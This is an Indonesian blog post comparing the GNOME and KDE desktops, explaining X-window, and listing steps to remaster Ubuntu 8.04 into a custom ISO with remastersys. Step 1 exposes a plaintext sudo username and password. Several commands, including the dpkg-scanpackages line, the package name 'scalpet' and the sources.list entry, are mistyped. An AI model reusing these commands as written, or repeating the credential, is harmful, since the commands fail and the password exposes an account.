    GNOME - Guh-Nome (GNU Network Object Model Environment) adalah graphical user interface (GUI) & aplikasi desktop untuk sebagian pengguna Unix dan Linux. Ada juga yang di tujukan untuk membuat OS Linux lebih mudah di gunakan untuk non-pemrogram yang pada umum nya terkalit dengan Windows dan kumpulan aplikasi yang menyerupai. GNOME adalah salah satu desktop bagi para pengguna Linux yang memiliki kemudahan memilih aplikasi desktop, dari beberapa tampilan desktop yang tersedia. Dengan GNOME desktop dapat di buat agar terlihat seperti Windows98, Mac OS, atau dengan efect 3D desktop. Gnome juga memiliki kemiripan yang bisa di temukan di Windows Office 97, word processor, a spreadsheet program, database manager, presentation developer, Web browser, dan e-mail program.

    GNOME berawal dari upaya dan usaha pengembangan para sukarelawan yang bekerja di bawah naungan Free Software Foundation, sebuah organisasi yang di dirikan oleh richard Stallman. Stallman dan anggota Free Software Foundation meyakini bahwa source code harus selalu publik dan terbuka untuk perubahan sehingga terus dapat di tingkatkan dan dikembangkan oleh orang lain.GNOME sebagai upaya atau alternatif agar pasar aplikasi desktop tidak di pegang oleh 1 vendor.Tujuan GNOME adalah menyediakan sejumlah aplikasi yang mudah dan ramah untuk di gunakan.Selain sebagai desktop, GNOME juga datang untuk pengguna dan kumpulan aplikasi handheld PalmPilot.

    KDE
    KDE adalah (K Desktop Environment) merupakan salah satu windows manager di sistem operasi berbasis UNIX. Pembuatan aplikasi yang berjalan di KDE harus mengikuti standar antarmuka yang ramah dan efisien bagi penggunanya. KDE adalah sebuah aplikasi desktop environment untuk sistem operasi berbasis UNIX (termasuk Linux, FreeBSD, NetBSD dan lain-lainnya). Fungsinya adalah untuk mengurangi penggunaan command line yang mungkin terlalu rumit bagi pengguna yang awam di sistem operasi berbasis UNIX tersebut, sehingga pengoperasiannya semudah mengoperasikan desktop pada lingkungaN

    GNOME VS KDE
    KDE dan GNOME merupakan suatu GUI (graphical user interface) atau desktop environtment (lingkungan desktop) yang memudahkan user untuk bisa mengakses aplikasi di linux. Sebenarnya GUI itu tidak hanya KDE dan GNOME saja yang ada, tapi ada juga yang namanya IceWM,XFCE,Blackbox,dan Fluxbox. ringkasnya GUI itu adalah tampilan yang menjembatani penggunaan sistem linux dengan user agar lebih mudah digunakan, jadi usernya tinggal klak-klik aja sana sini.

    PERLU diingat bahwa GUI pada linux (yaitu KDE,GNOME dll) berbeda dengan sistem operasi W NDOWS. Kalau di windows, GUInya termasuk sistem utama. AKibatnya ketika GUI pada windows crash, maka sistem utama juga akan ikut crash. Berbeda dg linux, dimana GUInya berjalan di atas sistem X-window. Jadi ketika GUI atau Xwindownya crash, sistem utamanya tidak ikut crash. solusinya cukup restart aja lingkungan X-windownya Dengan kata lain GUI pada linux bukanlah sistem, melainkan aplikasi grafis yang berjalan di atas sistem. Kita anggap saja X-window adalah baju, sedangkan sistem utama adalah orang. KEtika bajunya robek tentu kita tidak perlu menjahit orangnya tetapi bajunya yang kita jahit, atau ganti dg baju yang lain.
    Sebenarnya X-window adalah kumpulan bagian yang bekerjasama untuk menampilkan GUI, bagian2 tersebut adalah :
    - dasar sistem window, program yang menyediakan layanan untuk sistem X-window
    - X network protocol, protokol yang digunakan untuk berkomunikasi lewat jaringan
    - Xlib, interface tingkat rendah. Bagian utama yang mengimplementasikan X Netwotk protocol antara sistem jaringan dengan program-program tingkat tinggi
    - Window manager, menghubungkan ketiga bagian di atas. WIndow manager adalah aplikasi X yang berfungsi untuk mengatur bagaimana window ditampilkan kepada pengguna..

    Remastersys Linux Distro

    remastering itu cara untuk menambahkan atau mengurangi aplikasi-aplikasi atau default layanan yang ada di sebuah OS linux. Yang bisa ditambahkan seperti tema, background atau aplikasi-aplikasi software lainnya.

    nah ini langkah-langkahnya:
    Sedangkan untuk mempermudah pembuatan iso ketika proses remastering
    selesai dilakukan, maka digunakan tool yang disebut remastersys. Tool ini
    digunakan untuk mengkonversi system operasi yang telah diberi tambahan
    aplikasi ke dalam bentuk .iso sehingga nantinya bisa dibuat dalam bentuk
    livecd.
    Langkah-langkah yang digunakan dalam melakukan remastersys ini
    adalah:

    1. Melakukan instalisasi system operasi yang akan digunakan, yang
    dalam ini adalah linux ubuntu 8.04 dengan menggunakan cd live
    ubuntu 8.04. Sudo username:hendy, password:laziale

    2. Setelah system operasi terinstal, hal berikutnya yang dilakukan adalah
    mencari beberapa aplikasi recovery yang akan ditambahkan ke dalam
    system operasi.

    3. Kemudian dilakukan penginstallan tool remastersys. Saat
    penginstallan remastersys, pada awalnya akan menemui kegagalan
    karena dependensi yang dibutuhkan belum tersedia. Untuk itu
    dilakukan penginstallan dependensi melalui internet atau melalui dvd
    repo.

    4. Membuat folder baru di direktori home/hendy yang nantinya akan
    digunakan sebagai repository local. Dalam hal ini folder yang dibuat
    diberi nama repo_tubes

    5. Kemudian memindahkan aplikasi yang telah dibuat ke dalam folder
    repo_tubes dan kemudian mengekstrak tiap aplikasi tersebut. Setelah
    semua terekstrak maka dilakukan penghapusan terhadap file-file
    aplikasi sebelum diekstrak yang masih dalam bentuk
    .tar/.tar.gz/.tar.bz2

    6. Langkah selanjutnya adalah masuk ke dalam terminal. Setelah masuk
    maka hal yang dilakukan adalah mengetikkan perintah (sudo dpkgscanpackages
    repo_tubes/dev/null | gzip -9c > repo_tubes/Package.gz)
    yang bertujuan unutk mengeset folder repo-tubes menjadi repository local.
    7. Setelah itu mengetikkan perintah (sudo gedit /etc/apt/sources.list).
    Setelah sources list terbuka, kemudian melakukan pengeditan dengan
    menambahkan baris berisi deb file:home/hendy repo_tubes/ .
    Setelah itu menyimpannya(save) dan keluar dari sources list.

    8. Setelah melakukan pengeditan di dalam source list, hal berikutnya
    yang dilakukan adalah mengetikkan perintah (sudo apt-get update)
    untuk mengupdate package yang ada dalam repository local

    9. Setelah itu hal yang dilakukan adalah melakukan penginstallan
    terhadap aplikasi yang diperoleh.
    Perintah yang diketikkan adalah (apt-get install nama_aplikasi). Jadi
    perintah-perintah yang diketikkan adalah:
    ‐ Sudo apt-get install ddrescue
    ‐ Sudo apt-get install foremost
    ‐ Sudo apt-get install magicrescue
    ‐ Sudo apt-get install scalpet
    ‐ Sudo apt-get install testdisk

    10. Setelah semua proses penginstallan selesai, maka kemudian hal yang
    dilakukan adalah membuka synaptic. Tujuannya untuk
    membuang(uninstall) aplikasi-aplikasi yang tidak dibutuhkan untuk
    menghemat kapasitas ketika hasil remastering di-burn ke dalam cd.

    11. Setelah dirasa cukup, maka kembali ke dalam terminal untuk
    melakukan convert ke dalam bentuk iso. Perintah yang diketikkan
    adalah (sudo remastersys backup custom.iso)
    Hasil remastering dalam bentuk file iso (custom.iso) akan berada di
    direktori /home/remastersys.

    sebenarnya fungsi remastersys convert ke iso nya saja, dan kalau punya .iso berarti kita punya OS distro bikinan kita sendiri walau hanya nambah-nambahi aplikasi saja...
    posted by ACOM (linuxinuse) @ 23.33   0 comments
    PROFILE

    Name: ACOM (linuxinuse)
    Home:
    About Me: ALFA CENTURY MULTY SCIENCE PLUS suatu usaha sosial keilmuan dalam berbagai disiplin ilmu MANTIQ / LOGIC, didirikan pada tanggal 29 Maret 1994, dengan mengawali disiplin ilmu Electronika dan komputer pada basic program dan mengembangkannya pada era digital yg mendukung pengembangan software dan hardware pada usaha brainware yg simultan dan beradab, memilih ilmu sastra untuk mengembangkan astrofisika pada stimulasi dimensi 9.
    See my complete profile
    Catatan Acom
    UPLOAD DATA
    LINK BLOGGER
    © "ACOM" Alfa Century Multy Science Plus Blogger Templates by LINUXINUSE